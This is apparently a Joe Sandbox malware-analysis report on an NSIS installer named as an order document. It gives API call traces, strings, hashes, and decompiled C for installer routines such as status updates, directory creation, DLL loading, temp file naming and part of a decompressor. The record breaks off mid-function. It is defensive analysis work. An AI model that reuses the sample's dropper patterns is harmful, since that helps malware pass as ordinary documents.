CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Sigtelinjens\Tvtningerne\Tilegnelserne\Suppegrydernes79,00000000,00000000,00000031), ref: 004017C2

Part of subcall function 00406099: lstrcpynA.KERNEL32(?,?,00000400,004033DF,00423F20,NSIS Error,?,00000006,00000008,0000000A), ref: 004060A6

Part of subcall function 004051C0: lstrlenA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsa7CF6.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D70,00000000,?), ref: 004051F9
Part of subcall function 004051C0: lstrlenA.KERNEL32(00402D70,Skipped: C:\Users\user\AppData\Local\Temp\nsa7CF6.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D70,00000000), ref: 00405209
Part of subcall function 004051C0: lstrcatA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsa7CF6.tmp\System.dll,00402D70,00402D70,Skipped: C:\Users\user\AppData\Local\Temp\nsa7CF6.tmp\System.dll,00000000,00000000,00000000), ref: 0040521C
Part of subcall function 004051C0: SetWindowTextA.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsa7CF6.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsa7CF6.tmp\System.dll), ref: 0040522E
Part of subcall function 004051C0: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405254
Part of subcall function 004051C0: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 0040526E
Part of subcall function 004051C0: SendMessageA.USER32(?,00001013,?,00000000), ref: 0040527C

Strings

C:\Users\user\AppData\Local\Temp\nsa7CF6.tmp, xrefs: 004017A3, 00401812, 00401830
Call, xrefs: 00401775, 0040177E, 0040178B, 0040179D, 004017AE, 004017E4, 004017FA, 00401818, 00401858, 004018D9, 004018E2, 004018EC, 004018F7
C:\Users\user\AppData\Local\Temp\nsa7CF6.tmp\System.dll, xrefs: 00401826, 00401842
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Sigtelinjens\Tvtningerne\Tilegnelserne\Suppegrydernes79, xrefs: 00401786

Memory Dump Source

Source File: 00000002.00000002.23339788860.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.23339766481.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23339840163.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23339868673.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340031143.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340074688.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340113009.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340161078.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340206853.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Order_002376662-579588_Date 24082022.jbxd

Similarity

API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
String ID: C:\Users\user\AppData\Local\Temp\nsa7CF6.tmp$C:\Users\user\AppData\Local\Temp\nsa7CF6.tmp\System.dll$C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Sigtelinjens\Tvtningerne\Tilegnelserne\Suppegrydernes79$Call
API String ID: 1941528284-346214650
Opcode ID: c3cce3b1b11ccaad6b9a0a02c5ed75f3e7716a985c84d45dfc54a77f0996771f
Instruction ID: 2c94bdb1ed45b9066cdaff59bd30f99cb4fab6046a6a22cdc065c2defd4e90a3
Opcode Fuzzy Hash: c3cce3b1b11ccaad6b9a0a02c5ed75f3e7716a985c84d45dfc54a77f0996771f
Instruction Fuzzy Hash: CD41D871A00615BBCB10BFB5CC45EAF3669EF01329B21823FF522B10E1D77C89518A6E

Uniqueness

Uniqueness Score: -1.00%

Function 004051C0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 73
stringwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E004051C0(CHAR* _a4, CHAR* _a8) {
				struct HWND__* _v8;
				signed int _v12;
				CHAR* _v32;
				long _v44;
				int _v48;
				void* _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				CHAR* _t26;
				signed int _t27;
				CHAR* _t28;
				long _t29;
				signed int _t39;

				_t26 =  *0x423f04; // 0x10416
				_v8 = _t26;
				if(_t26 != 0) {
					_t27 =  *0x4247f4;
					_v12 = _t27;
					_t39 = _t27 & 0x00000001;
					if(_t39 == 0) {
						E004060BB(0, _t39, 0x420510, 0x420510, _a4);
					}
					_t26 = lstrlenA(0x420510);
					_a4 = _t26;
					if(_a8 == 0) {
						L6:
						if((_v12 & 0x00000004) == 0) {
							_t26 = SetWindowTextA( *0x423ee8, 0x420510); // executed
						}
						if((_v12 & 0x00000002) == 0) {
							_v32 = 0x420510;
							_v52 = 1;
							_t29 = SendMessageA(_v8, 0x1004, 0, 0); // executed
							_v44 = 0;
							_v48 = _t29 - _t39;
							SendMessageA(_v8, 0x1007 - _t39, 0,  &_v52); // executed
							_t26 = SendMessageA(_v8, 0x1013, _v48, 0); // executed
						}
						if(_t39 != 0) {
							_t28 = _a4;
							 *((char*)(_t28 + 0x420510)) = 0;
							return _t28;
						}
					} else {
						_t26 =  &(_a4[lstrlenA(_a8)]);
						if(_t26 < 0x800) {
							_t26 = lstrcatA(0x420510, _a8);
							goto L6;
						}
					}
				}
				return _t26;
			}

0x004051c6
0x004051d2
0x004051d5
0x004051db
0x004051e7
0x004051ea
0x004051ed
0x004051f3
0x004051f3
0x004051f9
0x00405201
0x00405204
0x00405221
0x00405225
0x0040522e
0x0040522e
0x00405238
0x00405241
0x0040524d
0x00405254
0x00405258
0x0040525b
0x0040526e
0x0040527c
0x0040527c
0x00405280
0x00405282
0x00405285
0x00000000
0x00405285
0x00405206
0x0040520e
0x00405216
0x0040521c
0x00000000
0x0040521c
0x00405216
0x00405204
0x0040528f

APIs

lstrlenA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsa7CF6.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D70,00000000,?), ref: 004051F9
lstrlenA.KERNEL32(00402D70,Skipped: C:\Users\user\AppData\Local\Temp\nsa7CF6.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D70,00000000), ref: 00405209
lstrcatA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsa7CF6.tmp\System.dll,00402D70,00402D70,Skipped: C:\Users\user\AppData\Local\Temp\nsa7CF6.tmp\System.dll,00000000,00000000,00000000), ref: 0040521C
SetWindowTextA.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsa7CF6.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsa7CF6.tmp\System.dll), ref: 0040522E
SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405254
SendMessageA.USER32(?,00001007,00000000,00000001), ref: 0040526E
SendMessageA.USER32(?,00001013,?,00000000), ref: 0040527C

Strings

Skipped: C:\Users\user\AppData\Local\Temp\nsa7CF6.tmp\System.dll, xrefs: 004051E0, 004051F2, 004051F8, 0040521B, 00405227

Memory Dump Source

Source File: 00000002.00000002.23339788860.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.23339766481.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23339840163.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23339868673.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340031143.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340074688.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340113009.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340161078.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340206853.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Order_002376662-579588_Date 24082022.jbxd

Similarity

API ID: MessageSend$lstrlen$TextWindowlstrcat
String ID: Skipped: C:\Users\user\AppData\Local\Temp\nsa7CF6.tmp\System.dll
API String ID: 2531174081-196242122
Opcode ID: fcc158ebca62b9556dfbd252b9eba4bb3779b7d310f90d2e7aaaf4a512f9cf01
Instruction ID: 0096fbd02e39835f1f24d83275f9c38cb3dbb50e4440d35a5143882a1b4174d0
Opcode Fuzzy Hash: fcc158ebca62b9556dfbd252b9eba4bb3779b7d310f90d2e7aaaf4a512f9cf01
Instruction Fuzzy Hash: 4D218C71900518BFDF119FA5DD84A9EBFB9FF04354F0480BAF904B6291C7798A418FA8

Uniqueness

Uniqueness Score: -1.00%

Function 00405686 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 39
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00405686(CHAR* _a4) {
				struct _SECURITY_ATTRIBUTES _v16;
				struct _SECURITY_DESCRIPTOR _v36;
				int _t22;
				long _t23;

				_v36.Sbz1 = _v36.Sbz1 & 0x00000000;
				_v36.Owner = 0x408374;
				_v36.Group = 0x408374;
				_v36.Sacl = _v36.Sacl & 0x00000000;
				_v16.bInheritHandle = _v16.bInheritHandle & 0x00000000;
				_v16.lpSecurityDescriptor =  &_v36;
				_v36.Revision = 1;
				_v36.Control = 4;
				_v36.Dacl = 0x408364;
				_v16.nLength = 0xc;
				_t22 = CreateDirectoryA(_a4,  &_v16); // executed
				if(_t22 != 0) {
					L1:
					return 0;
				}
				_t23 = GetLastError();
				if(_t23 == 0xb7) {
					if(SetFileSecurityA(_a4, 0x80000007,  &_v36) != 0) {
						goto L1;
					}
					return GetLastError();
				}
				return _t23;
			}

0x00405691
0x00405695
0x00405698
0x0040569e
0x004056a2
0x004056a6
0x004056ae
0x004056b5
0x004056bb
0x004056c2
0x004056c9
0x004056d1
0x004056d3
0x00000000
0x004056d3
0x004056dd
0x004056e4
0x004056fa
0x00000000
0x00000000
0x00000000
0x004056fc
0x00405700

APIs

CreateDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 004056C9
GetLastError.KERNEL32 ref: 004056DD
SetFileSecurityA.ADVAPI32(?,80000007,00000001), ref: 004056F2
GetLastError.KERNEL32 ref: 004056FC

Strings

C:\Users\user\Desktop, xrefs: 00405686
C:\Users\user\AppData\Local\Temp\, xrefs: 004056AC

Memory Dump Source

Source File: 00000002.00000002.23339788860.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.23339766481.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23339840163.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23339868673.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340031143.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340074688.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340113009.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340161078.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340206853.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Order_002376662-579588_Date 24082022.jbxd

Similarity

API ID: ErrorLast$CreateDirectoryFileSecurity
String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop
API String ID: 3449924974-26219170
Opcode ID: b585f5161d807d3f0f7c483c76382efe3a1db6be34ae0fb1d35030ff25d5446d
Instruction ID: f1d10c799bfca9e4ec05a1b7c6bbaf57c6c97cfabee98fddb41b1e3f6ffc1dc8
Opcode Fuzzy Hash: b585f5161d807d3f0f7c483c76382efe3a1db6be34ae0fb1d35030ff25d5446d
Instruction Fuzzy Hash: 13010871D10259EADF109FA4C9047EFBFB8EB14315F10447AD544B6290DB7A9604CFA9

Uniqueness

Uniqueness Score: -1.00%

Function 004063C3 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E004063C3(intOrPtr _a4) {
				char _v292;
				int _t10;
				struct HINSTANCE__* _t14;
				void* _t16;
				void* _t21;

				_t10 = GetSystemDirectoryA( &_v292, 0x104);
				if(_t10 > 0x104) {
					_t10 = 0;
				}
				if(_t10 == 0 ||  *((char*)(_t21 + _t10 - 0x121)) == 0x5c) {
					_t16 = 1;
				} else {
					_t16 = 0;
				}
				_t5 = _t16 + 0x40a014; // 0x5c
				wsprintfA(_t21 + _t10 - 0x120, "%s%s.dll", _t5, _a4);
				_t14 = LoadLibraryExA( &_v292, 0, 8); // executed
				return _t14;
			}

0x004063da
0x004063e3
0x004063e5
0x004063e5
0x004063e9
0x004063fb
0x004063f5
0x004063f5
0x004063f5
0x004063ff
0x00406413
0x00406427
0x0040642e

APIs

GetSystemDirectoryA.KERNEL32(?,00000104), ref: 004063DA
wsprintfA.USER32 ref: 00406413
LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 00406427

Strings

\, xrefs: 004063EB
UXTHEME, xrefs: 004063CC
%s%s.dll, xrefs: 0040640D

Memory Dump Source

Source File: 00000002.00000002.23339788860.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.23339766481.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23339840163.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23339868673.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340031143.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340074688.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340113009.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340161078.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340206853.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Order_002376662-579588_Date 24082022.jbxd

Similarity

API ID: DirectoryLibraryLoadSystemwsprintf
String ID: %s%s.dll$UXTHEME$\
API String ID: 2200240437-4240819195
Opcode ID: e24acbe6227527768190d78db3c852bebda673ce15d2d0c5597dd6d7ee2660dd
Instruction ID: c4678dfb2da91d08484603cd09ba86b434f6c063b959f4a2bfe8732341513f46
Opcode Fuzzy Hash: e24acbe6227527768190d78db3c852bebda673ce15d2d0c5597dd6d7ee2660dd
Instruction Fuzzy Hash: 69F0FC7054060967DB149768DD0DFEB365CEB08304F14057EA587E10D1D978D8358B98

Uniqueness

Uniqueness Score: -1.00%

Function 00405C61 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 33
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00405C61(char _a4, intOrPtr _a6, CHAR* _a8) {
				char _t11;
				signed int _t12;
				int _t15;
				signed int _t17;
				void* _t20;
				CHAR* _t21;

				_t21 = _a4;
				_t20 = 0x64;
				while(1) {
					_t11 =  *0x40a3cc; // 0x61736e
					_t20 = _t20 - 1;
					_a4 = _t11;
					_t12 = GetTickCount();
					_t17 = 0x1a;
					_a6 = _a6 + _t12 % _t17;
					_t15 = GetTempFileNameA(_a8,  &_a4, 0, _t21); // executed
					if(_t15 != 0) {
						break;
					}
					if(_t20 != 0) {
						continue;
					}
					 *_t21 =  *_t21 & 0x00000000;
					return _t15;
				}
				return _t21;
			}

0x00405c65
0x00405c6b
0x00405c6c
0x00405c6c
0x00405c71
0x00405c72
0x00405c75
0x00405c7f
0x00405c8c
0x00405c8f
0x00405c97
0x00000000
0x00000000
0x00405c9b
0x00000000
0x00000000
0x00405c9d
0x00000000
0x00405c9d
0x00000000

APIs

GetTickCount.KERNEL32 ref: 00405C75
GetTempFileNameA.KERNELBASE(?,?,00000000,?,?,00000006,00000008,0000000A), ref: 00405C8F

Strings

"C:\Users\user\Desktop\Order_002376662-579588_Date 24082022.exe" , xrefs: 00405C61
nsa, xrefs: 00405C6C
C:\Users\user\AppData\Local\Temp\, xrefs: 00405C64

Memory Dump Source

Source File: 00000002.00000002.23339788860.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.23339766481.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23339840163.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23339868673.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340031143.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340074688.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340113009.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340161078.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340206853.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Order_002376662-579588_Date 24082022.jbxd

Similarity

API ID: CountFileNameTempTick
String ID: "C:\Users\user\Desktop\Order_002376662-579588_Date 24082022.exe" $C:\Users\user\AppData\Local\Temp\$nsa
API String ID: 1716503409-861963717
Opcode ID: 2db5ec21233206098d740d0a7eec71b69382ff709a5caa38a177d135453c6e3c
Instruction ID: cf48cc2e124a12ae61d5b18fb9546061e9ffe7603c061e2a5f49afbd00461fe6
Opcode Fuzzy Hash: 2db5ec21233206098d740d0a7eec71b69382ff709a5caa38a177d135453c6e3c
Instruction Fuzzy Hash: F3F082363087047BEB108F55DC04B9B7F99DF91750F14803BFA48EA180D6B499648758

Uniqueness

Uniqueness Score: -1.00%

Function 00406576 Relevance: 7.7, APIs: 4, Strings: 1, Instructions: 198
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 98%

			E00406576(void* __ecx) {
				void* _v8;
				void* _v12;
				signed int _v16;
				unsigned int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v95;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				intOrPtr _v124;
				intOrPtr _v132;
				intOrPtr _v136;
				void _v140;
				void* _v148;
				signed int _t455;
				signed int _t456;
				signed int _t490;

				_t490 = 0x22;
				_v148 = __ecx;
				memcpy( &_v140, __ecx, _t490 << 2);
				if(_v52 != 0xffffffff) {
					while(1) {
						L3:
						_t455 = _v140;
						if(_t455 > 0x1c) {
							break;
						}
						switch( *((intOrPtr*)(_t455 * 4 +  &M00406FC8))) {
							case 0:
								__eflags = _v112;
								if(_v112 == 0) {
									goto L141;
								}
								_v112 = _v112 - 1;
								_v116 = _v116 + 1;
								_t455 =  *_v116;
								__eflags = _t455 - 0xe1;
								if(_t455 > 0xe1) {
									goto L142;
								}
								_t460 = _t455 & 0x000000ff;
								_push(0x2d);
								asm("cdq");
								_pop(_t494);
								_push(9);
								_pop(_t495);
								_t540 = _t460 / _t494;
								_t462 = _t460 % _t494 & 0x000000ff;
								asm("cdq");
								_t535 = _t462 % _t495 & 0x000000ff;
								_v64 = _t535;
								_v32 = (1 << _t540) - 1;
								_v28 = (1 << _t462 / _t495) - 1;
								_t543 = (0x300 << _t535 + _t540) + 0x736;
								__eflags = 0x600 - _v124;
								if(0x600 == _v124) {
									L12:
									__eflags = _t543;
									if(_t543 == 0) {
										L14:
										_v76 = _v76 & 0x00000000;
										_v68 = _v68 & 0x00000000;
										goto L17;
									} else {
										goto L13;
									}
									do {
										L13:
										_t543 = _t543 - 1;
										__eflags = _t543;
										 *((short*)(_v8 + _t543 * 2)) = 0x400;
									} while (_t543 != 0);
									goto L14;
								}
								__eflags = _v8;
								if(_v8 != 0) {
									GlobalFree(_v8);
								}
								_t455 = GlobalAlloc(0x40, 0x600); // executed
								__eflags = _t455;
								_v8 = _t455;
								if(_t455 == 0) {
									goto L142;
								} else {
									_v124 = 0x600;
									goto L12;
								}
							case 1:
								L15:
								__eflags = _v112;
								if(_v112 == 0) {
									_v140 = 1;
									goto L141;
								}
								_v112 = _v112 - 1;
								_v68 = _v68 | ( *_v116 & 0x000000ff) << _v76 << 0x00000003;
								_v116 = _v116 + 1;
								_t50 =  &_v76;
								 *_t50 = _v76 + 1;
								__eflags =  *_t50;
								L17:
								__eflags = _v76 - 4;
								if(_v76 < 4) {
									goto L15;
								}
								_t468 = _v68;
								__eflags = _t468 - _v120;
								if(_t468 == _v120) {
									L22:
									_v76 = 5;
									 *(_v12 + _v120 - 1) =  *(_v12 + _v120 - 1) & 0x00000000;
									goto L25;
								}
								__eflags = _v12;
								_v120 = _t468;
								if(_v12 != 0) {
									GlobalFree(_v12);
								}
								_t455 = GlobalAlloc(0x40, _v68); // executed
								__eflags = _t455;
								_v12 = _t455;
								if(_t455 == 0) {
									goto L142;
								} else {
									goto L22;
								}
							case 2:
								L26:
								_t475 = _v100 & _v32;
								_v136 = 6;
								_v80 = _t475;
								_t544 = _v8 + ((_v60 << 4) + _t475) * 2;
								goto L120;
							case 3:
								L23:
								__eflags = _v112;
								if(_v112 == 0) {
									_v140 = 3;
									goto L141;
								}
								_v112 = _v112 - 1;
								_t72 =  &_v116;
								 *_t72 = _v116 + 1;
								__eflags =  *_t72;
								_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
								L25:
								_v76 = _v76 - 1;
								__eflags = _v76;
								if(_v76 != 0) {
									goto L23;
								}
								goto L26;
							case 4:
								L121:
								_t477 =  *_t544;
								_t528 = _t477 & 0x0000ffff;
								_t509 = (_v20 >> 0xb) * _t528;
								__eflags = _v16 - _t509;
								if(_v16 >= _t509) {
									_v20 = _v20 - _t509;
									_v16 = _v16 - _t509;
									_v68 = 1;
									_t478 = _t477 - (_t477 >> 5);
									__eflags = _t478;
									 *_t544 = _t478;
								} else {
									_v20 = _t509;
									_v68 = _v68 & 0x00000000;
									 *_t544 = (0x800 - _t528 >> 5) + _t477;
								}
								__eflags = _v20 - 0x1000000;
								if(_v20 >= 0x1000000) {
									goto L127;
								}
								goto L125;
							case 5:
								L125:
								__eflags = _v112;
								if(_v112 == 0) {
									_v140 = 5;
									goto L141;
								}
								_v20 = _v20 << 8;
								_v112 = _v112 - 1;
								_t433 =  &_v116;
								 *_t433 = _v116 + 1;
								__eflags =  *_t433;
								_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
								L127:
								_t479 = _v136;
								_v140 = _t479;
								goto L3;
							case 6:
								__edx = 0;
								__eflags = _v68;
								if(_v68 != 0) {
									__eax = _v8;
									__ecx = _v60;
									_v56 = 1;
									_v136 = 7;
									__esi = _v8 + 0x180 + _v60 * 2;
									goto L120;
								}
								__eax = _v96 & 0x000000ff;
								__esi = _v100;
								__cl = 8;
								__cl = 8 - _v64;
								__esi = _v100 & _v28;
								__eax = (_v96 & 0x000000ff) >> 8;
								__ecx = _v64;
								__esi = (_v100 & _v28) << 8;
								__ecx = _v8;
								((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2;
								__eax = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9;
								__eflags = _v60 - 4;
								__eax = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
								_v92 = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
								if(_v60 >= 4) {
									__eflags = _v60 - 0xa;
									if(_v60 >= 0xa) {
										_t103 =  &_v60;
										 *_t103 = _v60 - 6;
										__eflags =  *_t103;
									} else {
										_v60 = _v60 - 3;
									}
								} else {
									_v60 = 0;
								}
								__eflags = _v56 - __edx;
								if(_v56 == __edx) {
									__ebx = 0;
									__ebx = 1;
									do {
										__eax = _v92;
										__edx = __ebx + __ebx;
										__ecx = _v20;
										__esi = __edx + __eax;
										__ecx = _v20 >> 0xb;
										__ax =  *__esi;
										_v88 = __esi;
										__edi = __ax & 0x0000ffff;
										__ecx = (_v20 >> 0xb) * __edi;
										__eflags = _v16 - __ecx;
										if(_v16 >= __ecx) {
											_v20 = _v20 - __ecx;
											_v16 = _v16 - __ecx;
											__cx = __ax;
											_t222 = __edx + 1; // 0x1
											__ebx = _t222;
											__cx = __ax >> 5;
											__eflags = __eax;
											 *__esi = __ax;
										} else {
											_v20 = __ecx;
											0x800 = 0x800 - __edi;
											0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
											__ebx = __ebx + __ebx;
											 *__esi = __cx;
										}
										__eflags = _v20 - 0x1000000;
										_v72 = __ebx;
										if(_v20 < 0x1000000) {
											__eflags = _v112;
											if(_v112 == 0) {
												_v140 = 0xf;
												goto L141;
											} else {
												__ecx = _v116;
												__eax = _v16;
												_v20 = _v20 << 8;
												__ecx =  *_v116 & 0x000000ff;
												_v112 = _v112 - 1;
												_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
												_t208 =  &_v116;
												 *_t208 = _v116 + 1;
												__eflags =  *_t208;
												_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
												goto L61;
											}
											goto L67;
										}
										L61:
										__eflags = __ebx - 0x100;
									} while (__ebx < 0x100);
									goto L57;
								} else {
									__eax = _v24;
									__eax = _v24 - _v48;
									__eflags = __eax - _v120;
									if(__eax >= _v120) {
										__eax = __eax + _v120;
										__eflags = __eax;
									}
									__ecx = _v12;
									__ebx = 0;
									__ebx = 1;
									__al =  *((intOrPtr*)(__eax + __ecx));
									_v95 =  *((intOrPtr*)(__eax + __ecx));
									goto L43;
								}
							case 7:
								L67:
								__eflags = _v68 - 1;
								if(_v68 != 1) {
									__eax = _v40;
									_v132 = 0x16;
									_v36 = _v40;
									__eax = _v44;
									_v40 = _v44;
									__eax = _v48;
									_v44 = _v48;
									__eax = 0;
									__eflags = _v60 - 7;
									0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
									__al = __al & 0x000000fd;
									__eax = (__eflags >= 0) - 1 + 0xa;
									_v60 = (__eflags >= 0) - 1 + 0xa;
									__eax = _v8;
									__eax = _v8 + 0x664;
									__eflags = __eax;
									_v92 = __eax;
									goto L70;
								}
								__eax = _v8;
								__ecx = _v60;
								_v136 = 8;
								__esi = _v8 + 0x198 + _v60 * 2;
								goto L120;
							case 8:
								__eflags = _v68;
								if(_v68 != 0) {
									__eax = _v8;
									__ecx = _v60;
									_v136 = 0xa;
									__esi = _v8 + 0x1b0 + _v60 * 2;
								} else {
									__eax = _v60;
									__ecx = _v8;
									__eax = _v60 + 0xf;
									_v136 = 9;
									_v60 + 0xf << 4 = (_v60 + 0xf << 4) + _v80;
									__esi = _v8 + ((_v60 + 0xf << 4) + _v80) * 2;
								}
								goto L120;
							case 9:
								__eflags = _v68;
								if(_v68 != 0) {
									goto L90;
								}
								__eflags = _v100;
								if(_v100 == 0) {
									goto L142;
								}
								__eax = 0;
								__eflags = _v60 - 7;
								0 | _v60 - 0x00000007 >= 0x00000000 = (_v60 - 7 >= 0) + (_v60 - 7 >= 0) + 9;
								_v60 = (_v60 - 7 >= 0) + (_v60 - 7 >= 0) + 9;
								__eflags = _v104;
								if(_v104 == 0) {
									_v140 = 0x1b;
									goto L141;
								}
								__eax = _v24;
								__eax = _v24 - _v48;
								__eflags = __eax - _v120;
								if(__eax >= _v120) {
									__eax = __eax + _v120;
									__eflags = __eax;
								}
								__edx = _v12;
								__cl =  *(__eax + __edx);
								__eax = _v24;
								_v96 = __cl;
								 *(__eax + __edx) = __cl;
								__eax = __eax + 1;
								__edx = 0;
								_t280 = __eax % _v120;
								__eax = __eax / _v120;
								__edx = _t280;
								__eax = _v108;
								_v100 = _v100 + 1;
								_v108 = _v108 + 1;
								_t289 =  &_v104;
								 *_t289 = _v104 - 1;
								__eflags =  *_t289;
								 *_v108 = __cl;
								goto L80;
							case 0xa:
								__eflags = _v68;
								if(_v68 != 0) {
									__eax = _v8;
									__ecx = _v60;
									_v136 = 0xb;
